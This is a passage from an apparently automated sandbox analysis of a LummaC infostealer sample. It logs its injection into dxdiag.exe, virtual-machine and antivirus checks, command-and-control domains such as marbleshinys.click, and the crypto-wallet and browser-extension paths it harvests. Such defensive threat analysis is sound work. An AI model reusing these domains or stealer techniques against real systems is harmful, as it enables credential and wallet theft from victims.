                Source: dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1609383602.0000000005423000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1645464639.0000000005427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click:443/api
                Source: dxdiag.exe, 00000002.00000003.1640390200.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638835789.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643295650.0000000002FE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marbleshinys.click:443/apiLSID
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
                Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: dxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: dxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64270
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 64243 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 64270 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64243
                Source: unknownNetwork traffic detected: HTTP traffic on port 64254 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64254
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49837 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49845 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49858 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49869 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64243 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64254 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64270 version: TLS 1.2
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
                Source: PI1EA8P74K.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: dxdiag.exe, 00000002.00000003.1526667120.0000000005436000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526365084.0000000005454000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PI1EA8P74K.exeReversingLabs: Detection: 86%
                Source: unknownProcess created: C:\Users\user\Desktop\PI1EA8P74K.exe "C:\Users\user\Desktop\PI1EA8P74K.exe"
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: PI1EA8P74K.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: PI1EA8P74K.exeStatic file information: File size 12940800 > 1048576
                Source: PI1EA8P74K.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xa59400
                Source: PI1EA8P74K.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x144000
                Source: PI1EA8P74K.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: PI1EA8P74K.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: PI1EA8P74K.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: PI1EA8P74K.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: PI1EA8P74K.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: PI1EA8P74K.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: PI1EA8P74K.exeStatic PE information: section name: .fptable
                Source: PI1EA8P74K.exeStatic PE information: section name: _RDATA
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\SysWOW64\dxdiag.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 8028Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696503903o
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696503903x
                Source: dxdiag.exe, 00000002.00000003.1640390200.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523232930.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638835789.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643171569.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638321610.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643295650.0000000002FE4000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603816067.0000000002FD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1640390200.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523232930.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638835789.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643295650.0000000002FE4000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603816067.0000000002FD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005439000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NVMware2
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696503903t
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696503903s
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696503903j
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696503903f
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005439000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696503903p
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information queried: ProcessInformationJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeMemory allocated: C:\Windows\SysWOW64\dxdiag.exe base: 400000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: marbleshinys.click
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 440000Jump to behavior
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 443000Jump to behavior
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 451000Jump to behavior
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 2DCC008Jump to behavior
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PI1EA8P74K.exeCode function: 0_2_00007FF7137527DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7137527DC
                Source: C:\Windows\SysWOW64\dxdiag.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: dxdiag.exe, 00000002.00000002.1643999732.000000000304E000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603770541.000000000304E000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603816067.0000000002FC1000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603816067.0000000002FD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: dxdiag.exe, 00000002.00000003.1638835789.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1610114752.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Windows Defender\MsMpeng.exe
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 8016, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: dxdiag.exeString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: dxdiag.exe, 00000002.00000003.1553515903.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyn
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.jsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
